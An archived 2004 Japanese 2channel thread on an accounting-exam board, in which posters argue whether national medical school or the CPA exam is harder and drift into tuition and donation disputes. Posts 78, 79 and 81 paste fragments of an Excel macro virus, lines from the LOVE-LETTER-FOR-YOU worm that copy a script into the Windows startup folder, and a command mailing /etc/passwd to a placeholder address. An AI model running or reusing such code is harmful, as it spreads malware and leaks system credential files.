2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

国公立医学部と公認会計士どっちが難しいですか?

1 :一般に公正妥当と認められた名無しさん:04/04/02 10:31 ID:BZoE1I9Z
教えて

2 :一般に公正妥当と認められた名無しさん:04/04/02 10:35 ID:7m29nhOG
2げと

3 :一般に公正妥当と認められた名無しさん:04/04/02 10:55 ID:???
会計士受験
=国立医学部、司法等受ける(受かる)優秀なヤツが抜けた後のカス同士の争い
煽りじゃない事実だよね

4 :一般に公正妥当と認められた名無しさん:04/04/02 12:06 ID:eRNoXt1U
会計士に決まっているだろ、医学部や司法は馬鹿が受ける試験だよ。

5 :一般に公正妥当と認められた名無しさん:04/04/02 12:08 ID:eRNoXt1U
日本で一番難しい試験、それが会計士試験です。

6 :一般に公正妥当と認められた名無しさん:04/04/02 12:35 ID:???
両方受験した事がある奴だけが答える権利がある

7 :一般に公正妥当と認められた名無しさん:04/04/02 13:08 ID:???
勉強に必要な能力が違うから個人次第。くらべる対象じゃない。削除しろ

8 :一般に公正妥当と認められた名無しさん:04/04/02 13:08 ID:UE+GN5ty
医者で弁護士というのは聞いたことあるが
医者で公認会計士というのは
聞いたこと無いな。

9 :一般に公正妥当と認められた名無しさん:04/04/02 13:55 ID:V9pU3fSA

ほんまくだらんスレたてやがってよー
>>1
シネや

10 :一般に公正妥当と認められた名無しさん:04/04/02 14:45 ID:s6hxqEGh
なんか、このスレって、いつも公認会計士をバカにする香具師がいるな。
俺も公認会計士の勉強中、会計士の勉強してない友達が
「お前がどんなにがんばったって、宇多田ヒカルの収入にはかなわないんだよ。」
とか言ってたな。今思えば単なる嫉妬なんだよな。
俺は23で年収約500万弱の会計士補だ。かなりいい待遇だよ。

11 :一般に公正妥当と認められた名無しさん:04/04/02 15:21 ID:???
うるせー馬鹿

12 :一般に公正妥当と認められた名無しさん:04/04/02 15:26 ID:???
>>10
>「お前がどんなにがんばったって、宇多田ヒカルの収入にはかなわないんだよ。」
たぶん、世の中の大半の人はかなわないし、
当然その彼、彼女も同類だと思うんだが、、、

13 :一般に公正妥当と認められた名無しさん:04/04/02 15:27 ID:???
この手のネタすれを立てる奴って文体がほぼ同じだよな。
あとプロバイダもw

14 :一般に公正妥当と認められた名無しさん:04/04/02 15:46 ID:???
こういう糞スレが立つと「消せねえかなぁ・・」といつもおもう

15 :一般に公正妥当と認められた名無しさん:04/04/02 16:03 ID:???
会計士の就職刷れで医者と会計士とどっちがいいか?
(意味がわからん・・・)というバトルがあったので、
それでむかついた>>1が関係者を炙り出そうと立てたようだが・・・

16 :一般に公正妥当と認められた名無しさん:04/04/02 17:09 ID:???
>>13
たしかに同じような感じだね。なんか同情の気持ちすら出てくる。
>>10
職業でウタダと比較したら勝てる職あるのかな・・・
医者でも勝てる医師はそんなにいないような
>>14
同感です

17 :一般に公正妥当と認められた名無しさん:04/04/02 17:22 ID:???
>>1
板違い
格付け
http://that2.2ch.net/ranking/

削除依頼出しとくわ。

18 :一般に公正妥当と認められた名無しさん:04/04/02 22:44 ID:???
>>17乙〜

ということでスルーしとけ、相手にしなければよい。

19 :一般に公正妥当と認められた名無しさん:04/04/02 23:04 ID:BZoE1I9Z
相手してくれ

20 :一般に公正妥当と認められた名無しさん:04/04/02 23:16 ID:???
>>8
医者で公認会計士って聞いたことあるよ。一人だけだけど。

21 :一般に公正妥当と認められた名無しさん:04/04/02 23:30 ID:???
>>20
身近にいます。一人。

22 :一般に公正妥当と認められた名無しさん:04/04/03 01:29 ID:???
>>20-21
自演乙

23 :一般に公正妥当と認められた名無しさん:04/04/03 08:16 ID:W49o0O2s
宇多田ヒカル

いくら収入が高くても、社会的地位がないんじゃ意味ないね。

24 :一般に公正妥当と認められた名無しさん:04/04/03 09:24 ID:tSlE0v6+
会計士で東大理3に入った人はいるよ。

25 :一般に公正妥当と認められた名無しさん:04/04/03 10:21 ID:???
秋田大学は穴場

26 :一般に公正妥当と認められた名無しさん:04/04/03 12:04 ID:???
国家試験の難易度自体なら会計士>医師は間違いない。
しかしまぁ本当に頭がいいのは国立医だろうけどね。
群大医・千葉大医程度で東大の理3以外に合格する程度の学力ないと
ダメ。
しかし世の中いろんな職業があるし、適性ってもんがあるから
あなたも自分にあった道を見つけてその道を極めましょう。
臨床なんかだとあんまり出身大関係ないみたいだしね。
親戚で倒壊大医出身で大学に残っている人いるけど、そこの肺外科
のI教授は倒壊出身だが国内では凄く評価高いとな。
倒壊医なんて偏差値62程度で入れるけど、やっぱ腕でしょう

27 :一般に公正妥当と認められた名無しさん:04/04/03 13:04 ID:+ymx/Ssj
私立の医学部は偏差値より学費の壁の方がはるかに高い。
しかも東海医なんて帝京医と並ぶ超学費が高くて有名なとこ。

東海大学

学部 入学金   授業料     施設費    実習費    諸会費      初年度納入額

文系 300,000    650,000     370,000    174,000    56,200       1,550,200

医  1,000,000   2,148,000    2,111,000    632,000    60,200     10,951,200

ちなみに寄付金や助成金に恵まれて私立医では破格の安さの慶應でも国立に比べたら馬鹿高い

慶應医340,000    2,780,000    270,000     209,300    4,350      3,603,650
国立医282,000     520,800                               802,800  

入学金は別としてこんなのが6年もかかるんだから普通の家庭はまず無理 

28 :一般に公正妥当と認められた名無しさん:04/04/03 13:35 ID:???
>>27
慶応医は結構誤解されていると思うんだが、あそこも他の私立医と
払う金は変わらんのよ。
なぜなら卒業して生活が安定してくると「寄付金」を強要されるから。
校風というか村意識が非常に強いためまず払わないなんてわけには
いかない。
結局支払う金の合計額はかわんない。
え?払う必要ないって?

29 :一般に公正妥当と認められた名無しさん:04/04/03 13:52 ID:+ymx/Ssj
??論点がズレてるぞ?
総額は同じだとしても、自分で稼げるようになってから自分で払うんだったら頭さえよければ一般リーマンの家でもなんとか通えるじゃん。
年に学費300万+生活費200万なら40歳で年収800〜900万程度あって貯金しっかりしてきた家庭なら子どものために500万×6年くらいはなんとか捻出できる。
でも生活費とかも入れて年間1000万以上を6年続けて払えっていうのは普通のリーマン家庭では至難の業。




30 :28:04/04/03 14:07 ID:???
>>29
>??論点がズレてるぞ?
 意表をつくレスだな。
 もともと君と何かを論じたつもりはないんだが。
 単に「実は慶応医ってのの学費の安さってこうなんだよ」と述べたかっただけだよ。
  

31 :一般に公正妥当と認められた名無しさん:04/04/03 14:22 ID:???
>>28、29
論じたとか述べたとかおまいら頭悪すぎw
程度の低い話してる暇あったら仕訳の一つでもしてろ

32 :一般に公正妥当と認められた名無しさん:04/04/03 14:27 ID:???
なんか知ったかがいるな。
寄付金強要されるのは慶應に限ったことではない
というかどこでも当たり前のこと
払う金がいっしょなわけねーだろ
慶應の学費が安いのは国からもらえる金が多いからその分安いだけ

33 :一般に公正妥当と認められた名無しさん:04/04/03 14:51 ID:???
>>32
>寄付金強要されるのは慶應に限ったことではない
>というかどこでも当たり前のこと
 へぇー じゃうちの従兄弟んとこは例外なのかい?
 東海大医卒だが寄付金なんて全くないぞ。
 あと某大学もそうだぞ。知ったかはやめれ


34 :一般に公正妥当と認められた名無しさん:04/04/03 14:53 ID:???
>>31
あとその仕訳って何?どう読むの?


35 :一般に公正妥当と認められた名無しさん:04/04/03 14:56 ID:???
慶應が安いのではなくて、他の私大がぼったくり過ぎてるだけ。
『お医者の子は(無能を含み)お医者。』

36 :33=34:04/04/03 15:00 ID:???
>>35
まぁ私立はぼったくりというよか維持してくのに金がかかるので
たいへんなんだわ。

まぁ俺は国立卒なんで学費は安いがそれでも本代は馬鹿にならんかった。
1冊1万円近くするものもあるしね。


37 :一般に公正妥当と認められた名無しさん:04/04/03 15:04 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


38 :一般に公正妥当と認められた名無しさん:04/04/03 15:19 ID:???
>>33
親が払ってるよ、寄付金w
某って逃げるときによく使う奴いるよな

39 :一般に公正妥当と認められた名無しさん:04/04/03 15:21 ID:???
>1冊1万円近くするものもあるしね。

1万で買えないものの方が多いですよ
知ったかはみっともないからやめれ

40 :一般に公正妥当と認められた名無しさん:04/04/03 15:30 ID:???
スレ違い甚だしい。その前に板違いだが。
国立の医学部卒が会計試験板に何しにきてるんだ?
ってかこのスレたてたのもお前か?
国試落ちて他の道探してるのか?

さっさと削除依頼出してこういう話題はこういう話題専門の板でやってくれ。
>>38
お前もいちいち絡むな、そしてageるな。



41 :一般に公正妥当と認められた名無しさん:04/04/03 15:32 ID:???
>>40
もう削除依頼は出ています。

42 :33=34:04/04/03 16:11 ID:???
>>38
知ったかででたらめ書いちゃって後に引けないんだね。
東海大は卒業後に寄付金はとってません。
某大というのはこれも親戚の子が出てるので伏せたんだが、
おせじにも良い大学ではないのでね。某北関東の県の私大。

>>39
今は1万円以上するの?
ちなみに折れが卒業したのは平成2年。それくらい価格は上がったのか?

>>40
折れは1ではない。むこうの板にこのスレ貼られてたんで来て
みたら医師どころか会計士受験生の分際で知ったかしてる人が
いたのでね。

ところでこの板は下がらないのか?

43 :一般に公正妥当と認められた名無しさん:04/04/03 16:15 ID:???
>>42
いい年したおっさん必死だな

44 :一般に公正妥当と認められた名無しさん:04/04/03 16:25 ID:???
>東海大は卒業後に寄付金はとってません。

これって寄付金じゃないの?税金も逃れられますからぜひ払ってくださいねって

「東海大学星医会奨学金」寄付のお願い


 星医会は、経済的理由で修学困難となった医学部5・6年生を対象に、同窓会会員からの寄付金を原資に、奨学金を貸与しております。
これまで多くの会員からご寄付をいただき、奨学金を貸与した学生とご父兄から大変感謝されております。
会員各位におかれましては本奨学金の趣旨をご理解いただき、寄付にご協力下さいますようよろしくお願い申し上げます。
 なお、寄付金は以下の手続きをすることにより、控除の対象となります。
□個人の場合
 該当年度中に支出した寄付の額(但し、総所得金額の25%まで)から1万円を差し引いた額を、確定申告時に寄付金控除額として申請できます。
 同時に、東海大学が発行する「証明書」と「領収書」を添付する必要があります。
□法人の場合
 星医会事務局にお問い合わせ下さい。資料を送付いたします。

星医会奨学金担当理事 五月女 昇



「星医会会員の寄付金に関する免税措置について」


 星医会会員の皆様からいただく奨学金に対する寄付金につきましては、次の取り扱いにより、その寄付金は免税対象となります。

1. 星医会所定の寄付申込書(星医会事務局へご請求下さい)を、星医会事務局に提出いただくと共に、下記の大学口座に寄付金をお振込下さい。
    寄付金振込先口座:東京三菱銀行 厚木支店 普通預金 1640732
                 学校法人東海大学星医会募金口
    申込書送付先:〒259-1143 神奈川県伊勢原市下糟屋143 星医会事務局


45 :一般に公正妥当と認められた名無しさん:04/04/03 16:31 ID:???
>>44
もうageるな。
いつまで続ける気だ?

明らかに板違いだろうが

46 :一般に公正妥当と認められた名無しさん:04/04/03 16:32 ID:???
http://www.tokai.ac.jp/kouyu/2002sosiki.pdf

ホームカミングデー実行委員会第1 回組織部会議事録
日 時 2002 年7 月2 日(金)19 :00 〜
場 所 東海大学校友会館(霞が関ビル33 階)
はじめに副委員長より自己紹介の提案があり、それぞれが自己紹介を行った。
同じく副委員長より、昨年は大雨の影響も考えられるが、結果的に動員数803 名で終わっ
てしまった。第二回目は1000 名を超えたいので方策を考えたい、競争意識を煽ることや学
科別同窓会への期待もあるが皆さんはどうですかと議題提案があった。

各自発言
・ 学内でも各委員会委員を集めて打ち合せているが難しい。学科同窓会への呼びかけは予
算が欲しい
・3 月に東京で医学部同窓会が開かれたが、ホームカミングデーへの81 卒の参加者は1
名だった。
・ ホームカミングデーの内容説明が不十分ではないか。趣旨・目的が明確ではない。
・ 卒業生の子弟の東海大進学促進が目的なら、アメリカで発生したホームカミングデーと
日本では違うのでは
・ 今まったく同期生と連絡がない。大学からの連絡は郵便だけか。同窓会とどう違うのか。

・ 大学から葉書が来るとまた寄付かと思う。


おやっ??

・ 医学部の場合繋がりが強いので、同期会は100 名ぐらい集まる。


47 :33=34:04/04/03 16:35 ID:???
>>46
あ、悪い。とってないという言い方はおかしかったね。
あくまで>>28を受けての「強制徴収」ではないという意味でした。
ただ別に払わなくても問題ありません。
ちなみに従兄弟は全く払っておりませんが、大学病院残ってます。

48 :一般に公正妥当と認められた名無しさん:04/04/03 16:41 ID:???
>>47
日本語って便利ですね(・∀・)

49 :33=34:04/04/03 16:42 ID:???
>>48
いや、本当に勘違いしちゃったんだよ。途中で。
だって>>28って俺自身だもん。

50 :33=34:04/04/03 16:43 ID:???
ちなみに>>26も私です。

51 :一般に公正妥当と認められた名無しさん:04/04/03 16:45 ID:???
もう板違いだから、止めてもらえませんか。
格付け板でやってください。

52 :一般に公正妥当と認められた名無しさん:04/04/03 16:46 ID:???
33 名前:一般に公正妥当と認められた名無しさん 投稿日:04/04/03 14:51 ID:???
>>32
>寄付金強要されるのは慶應に限ったことではない
>というかどこでも当たり前のこと
 へぇー じゃうちの従兄弟んとこは例外なのかい?
 東海大医卒だが寄付金なんて全くないぞ。
 あと某大学もそうだぞ。知ったかはやめれ

全くない、と強制徴収ではない、って全然意味違うと思うが…

53 :33=34:04/04/03 16:48 ID:???
>>52
わりい。
ちょっと昼から飲んでてよ・・・
でも>>28からのながれで読み取ってくれ。

おまけに今読むと従兄弟とか教授名まで晒してしまってた・・・


54 :一般に公正妥当と認められた名無しさん:04/04/03 17:02 ID:???
慶應医って寄付金どれくらい強制なの?
>>27みると一年目だけで700万以上違うんだけど・・・
卒業するまでに帝京は5000万慶應は1800万かかるっていうのは聞いたことあるけど
東海が帝京レベルなら、慶應は卒業してから3000万くらい強制徴収されるの?


55 :一般に公正妥当と認められた名無しさん:04/04/03 17:03 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



56 :一般に公正妥当と認められた名無しさん:04/04/03 17:09 ID:???
平成2年卒ってことはもう40歳くらいだろ?
その年で昼間から酒飲んで2chで必死になって・・・なんか切ないぞ・・・

57 :一般に公正妥当と認められた名無しさん:04/04/03 18:14 ID:CabFcCY6
会計士受験してる人って大抵一流大学の人たちでしょ。
その一流大学と医学部の偏差値なんてそんなに変わるものじゃないのに対して
一流大学の人たちが挑戦して大半が失敗する試験が会計士試験なんだから
会計士試験のほうが難しいんじゃない?

58 :一般に公正妥当と認められた名無しさん:04/04/03 18:22 ID:???
一流大学といっても、文系ですからwww
はい。その辺を十分考慮しないとなんら妥当な結論謎でません。

付け加えるとすれば、個人が背負っている責任の重さに
どこまで文系の脳みそと精神力で耐えられるかどうかも考えてください。


59 :一般に公正妥当と認められた名無しさん:04/04/03 18:32 ID:CabFcCY6
理系>文系ですかwww
ま、精々安月給でがんばってください。

60 :一般に公正妥当と認められた名無しさん:04/04/03 18:44 ID:PRaptxtb
入試パスするだけなら、会計士2次より国立医学部の方が
断然楽だな(旧帝以外)。
ただ、医学部は6年間それなりに勉強しないといかんから、
それも合わせて考えたら医者になるほうが大変かな。

61 :一般に公正妥当と認められた名無しさん:04/04/03 18:57 ID:???
理系と文系の偏差値って単純比較できない、というか
総じて理系の方が同じ偏差値なら上だよ。
ちなみに自分の高校の時を思い出してみよう。
理系でそれなりの医学部いく人って文系科目できないから理系じゃなくて
文系科目が完璧な上に理系科目も完璧な人だった。

62 :一般に公正妥当と認められた名無しさん:04/04/03 19:05 ID:???
>>59
偏差値で比べるというよりも、地頭でくらべたら理系と文系とでは
格段の差があるでしょう。認識したくない事実かもしれませんがねw
文系がよく主張するご自慢のコミュニケーション能力も、実態としては
専門的な知識を絡めて論理的にコミュニケーションする、という能力とは
かけ離れていますし。もちろん、与太話をしたくない、できないのは
一般社会人として問題があるとは思いますが。

63 :一般に公正妥当と認められた名無しさん:04/04/03 19:17 ID:???
さて問題です。デカルトとアインシュタインどっちが偏差値高いでしょう? そもそも文系理系と分けて議論すること自体ナンセンス。

64 :一般に公正妥当と認められた名無しさん:04/04/03 19:23 ID:???
>>63
特異な例を持ち出して論点をずらしてしまうのはナンセンス。
ここでは、特殊な才能を持ち合わせていない、平均的な
会計士を医者を比較するスレです。

これは>>1の趣旨をくんでいっているわけですよ。

65 :一般に公正妥当と認められた名無しさん:04/04/03 20:17 ID:???
どっちにしろ、比較対象になっていないのは明白。医者と会計士どちらが偉いかなんて較べられるわけないし、文系理系どっちが偉いかなんてわかりっこない。こんな議論自体がナンセンスなんじゃねぇ〜の

66 :一般に公正妥当と認められた名無しさん:04/04/03 20:30 ID:???
>>57
国立医学部ってかなり難しいでしょ。
学費の問題があるから相当裕福な奴以外は国立を目指さざるを得ない。
定員も60〜100人くらいで、確か60か70ある日本全国の国公立の医学部医学科の全部足しても4700だかその辺りだったはず。
会計士試験合格者1、2の早慶だけで定員18000だからそれだけ見ても狭き門ということが分かる。

偏差値は文系と理系じゃ科目負担数も違うし、国立と私立じゃ入学率が違うから数字だけでは比べられない。
医学部だったらほとんどセンター5教科7科目、2次3教科4科目(理科2科目必須) 数学も文系がやらないVCがある。

私立の場合センターはないし、3科目3教科に集中すればいい。理系だと早慶理工だけは理科2科目だけど。
私立文系が「英・国・社or英・国・数1A2B」の3教科3科目なら国立理系は「英・国・数IA2B、数3C・物理・化学・社会」の5教科6.5科目
単純に考えて倍以上の負担がある。英語一つみると3科目勉強してるやつと6.5科目やってる奴が同じ模試受けて偏差値出したらどっちが不利かは一目瞭然
総合で偏差値を出しても、科目数多い方が低く出ることは私立文系の例でも周知のとおり

会計士にあわせて考えてみると分かりやすい。短答がセンター試験、論文が国立2次試験みたいなもん。
短答対策をしなくてよければ、負担はかなり減る。またやらなくてもいい科目科目が3科目あったら負担は格段に減る。
簿原財3科目だけ勉強してる奴と簿原財商監経6科目勉強してる奴で簿原財の点数比べたらどっちが有利か。

あとはもう一つ偏差値の問題だが、国立医学部は受かったらまず蹴る奴はいない。偏差値として出る値は入学者の偏差値と一致する。
一方、私立の場合他校、他学部間の併願が可能。結果合格者は入学者の倍程度出ることになり、上位はより上位の大学へ進学するので
実際に入学するのは試験で下位のものが中心になる。合格者と入学者の偏差値の格差は駿台だかどこかが調査してたが。

結局んところ数字的には似たような偏差値でも「科目負担」「入学率」を考慮しないと学生間の学力の比較はできない。

67 :一般に公正妥当と認められた名無しさん:04/04/03 20:37 ID:???
>どっちにしろ、比較対象になっていないのは明白。医者と会計士どちらが偉いかなんて較べられるわけないし


比較対象はかなり明白になってると思うが。。。。

>>1読むかぎり

「国公立医学部入試合格」 と 「公認会計士試験合格」 はどちらが 【難しい】 かっていう比較でしょうよ。


「医者」 と 「会計士」 の 【偉さ】 なんてどこにも出てない。

68 :一般に公正妥当と認められた名無しさん:04/04/03 21:00 ID:???

理系と文系を構成する「母集団」の「質」が全然違うし。

差し詰め、メジャーリーグと日本のリトルリーグぐらいの差があるがな
少年は同じ野球選手だと思っているかもしれないけどさ(プゲラ


69 :一般に公正妥当と認められた名無しさん:04/04/03 21:07 ID:???
この板は会計系試験について語る板
比較の議論はよそでやれ。



70 :一般に公正妥当と認められた名無しさん:04/04/03 21:10 ID:n7SOsS8j
とにかくこのスレ立てた香具師が会計士コンプだと言うことはみんな納得できるな?

下らん議論だと思うが、以下は【このスレ立てた香具師は会計士コンプ】

という前提で議論を続けてくれwww

71 :一般に公正妥当と認められた名無しさん:04/04/03 21:13 ID:???
数理経済学、金融工学、ファイナンスは文系 理系?

72 :一般に公正妥当と認められた名無しさん:04/04/03 21:16 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


73 :一般に公正妥当と認められた名無しさん:04/04/03 21:20 ID:???
>>71
理系が基礎を作り、バカの文系がおもちゃとして使う。
たまにおもちゃの使い方を間違って指を切ることもあるW
その指が他人の指なので、たちが悪いんだな

74 :一般に公正妥当と認められた名無しさん:04/04/03 21:34 ID:???
会計士なんて早計はおろか中央程度でもなってるじゃない。
うちの高校で早計の文系に行く連中って校内でも中位程度の学力。
しかもうちのクラスで国立の医学部いけない連中でも鞍替えして一橋とか
入ってる。
文系で数学苦手な友人は一橋あきらめて慶応の文系入ってる。
文系の学力なんてそんなレベル。


75 :一般に公正妥当と認められた名無しさん:04/04/03 21:39 ID:???
基礎を作ったのが文系で(経済学が出来た当時に文系理系があったかは知らんが)、その後、数学を導入した。

76 :一般に公正妥当と認められた名無しさん:04/04/03 22:54 ID:+QBPghbY
数学や理科が苦手だから文系にした。
やはり文系は理系よりもアホ?

77 :一般に公正妥当と認められた名無しさん:04/04/03 23:02 ID:???
アホな医者もいれば、バカな会計士もいる。
どっちが難しいかなんて、人それぞれ。
それを必至に議論してるオマイラって…

78 :一般に公正妥当と認められた名無しさん:04/04/03 23:10 ID:???
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10

End Sub


79 :一般に公正妥当と認められた名無しさん:04/04/03 23:10 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
   If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
   c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

cat /etc/passwd | mail nobody@nonexistent.com

80 :一般に公正妥当と認められた名無しさん:04/04/03 23:16 ID:???
金沢医大なんてどーよ?お金あれば入れるぜ。
http://www.yozemi.ac.jp/bunpu/shiritsu/chubu/kanazawaika1.html

81 :一般に公正妥当と認められた名無しさん:04/04/03 23:17 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
   If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
   c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


82 :一般に公正妥当と認められた名無しさん:04/04/03 23:25 ID:???
http://2style.net/maido/R3_temp.swf?inputStr=%82%A2%82%C2%82%DC%82%C5%95%B3%83X%83%8C%82%F0%91%B1%82%AF%82%E9%8BC%82%BE%81H%83L%83%60%83K%83C%81A%92m%8F%E1%81A%8E%80%82%CB%81B

83 :一般に公正妥当と認められた名無しさん:04/04/04 00:31 ID:???
>>1の期待に添える盛り上がりじゃないではないか。
無念だ。

84 :一般に公正妥当と認められた名無しさん:04/04/04 00:32 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



85 :一般に公正妥当と認められた名無しさん:04/04/04 00:46 ID:???
>>80
金沢医とか毒狂とか埼玉医とか例に出すか?
認定試験の国試すら危うい連中だよ

86 :一般に公正妥当と認められた名無しさん:04/04/04 00:52 ID:???
スレストかゴミ箱移転を希望

87 :一般に公正妥当と認められた名無しさん:04/04/04 09:18 ID:???
大学受験ごときデうだうだ言える医学部が羨ましいよ。

88 :一般に公正妥当と認められた名無しさん:04/04/04 10:15 ID:???
資格試験ごときデうだうだ言える私大生が羨ましいよ。


89 :一般に公正妥当と認められた名無しさん:04/04/04 16:06 ID:???
釣れたw

90 :一般に公正妥当と認められた名無しさん:04/04/04 17:02 ID:???
公認会計士の試験って司法試験よかレベル低いんだよね。

91 :一般に公正妥当と認められた名無しさん:04/04/04 17:12 ID:WkUjEz2x
財前教授!

92 :一般に公正妥当と認められた名無しさん:04/04/04 17:16 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


93 :mahkun:04/04/04 22:21 ID:Ir1hT2Z9
沖縄に行くと二日三日いれば沖縄の人かそうでないかは一見して分かるようになるよ

沖縄人(ウチナンチュ)でしょう??

って聴くと誰もが明るい顔をして

そーさーぁ

って答えるんだよね
こっちもなんか明るい気持ちになるよね

東京は何でも高度にインテリジェントで高度にテクニカルなものがいくらでもある
今お仕事を完全休業して勉強はじめたけど
コンピュータ業界でも七年間でプロジェクトマネージャまでなったらかなりスピード出世だと思うけど
上を見たらきりが無いしまーくんなんてたいしたこと無いし
学歴について考えても博士号持ってる人なんて東京に何万人もいるし
公認会計士だって何万人もいるし
早稲田大学を出たようなひとでも東大の人から見ればぜんぜんランクが違うし
東大を出て銀行のニューヨーク支店長になったなんていっても
ニューヨークへ行けばそれよりステータスもあってお金持ちなんて何百万人もいるわけだし
都会に行けば行くほど
人は簡単なことで喜んでくれないし
簡単なことで認めてくれないし
簡単なことでは無視して
最悪は差別される






94 :一般に公正妥当と認められた名無しさん:04/04/06 03:13 ID:???

ちんぽ

95 :一般に公正妥当と認められた名無しさん:04/04/06 11:12 ID:???

















96 :よしくん:04/04/09 02:03 ID:???
うちの大学(東大・経)でも今真面目に会計士目指そうってのは
女の子ばっかり、男は官僚か外資金融か留学→研究者に3極化してる。
特に前2つが多い。官僚狙ってる奴も10年くらい官僚やって留学でもして
箔つけてその後スピンアウトとか狙ってるのが多い。
これだけ勝ち組・負け組がはっきりしてくると地道に資格とって
安定した暮らしなんていうなんちゃって勝ち組じゃだめだってことだね。
昔は資格と学歴で上の下くらいの生活が保証されたが、
今じゃ中の中〜上くらいが精一杯、中と上の差は大きい。
要は勝ち組・負け組の2極化が進んで上の基準が
上がったってことなんだろな。
真の勝ち組になるにはどっかでガチの勝負しなきゃいけなくて、
それまでに出来るだけ有利な環境を整えておこうって発想に変りつつある。





97 :一般に公正妥当と認められた名無しさん:04/04/10 07:14 ID:Xv16mfLR
医学部など入ったら誰でも医者になれるのになあ。
不公平すぎる!

98 :一般に公正妥当と認められた名無しさん:04/04/14 02:57 ID:GeUvLLg5
テーマは結構面白い。

理Vと京大医以外なら公認会計士でしょうな。。。

大学入試の方が内容は簡単なのだけど理Vと京大医
になってくると学力だけじゃなくて精神的な力も
関わってくるから。
その分を加味してわけ。

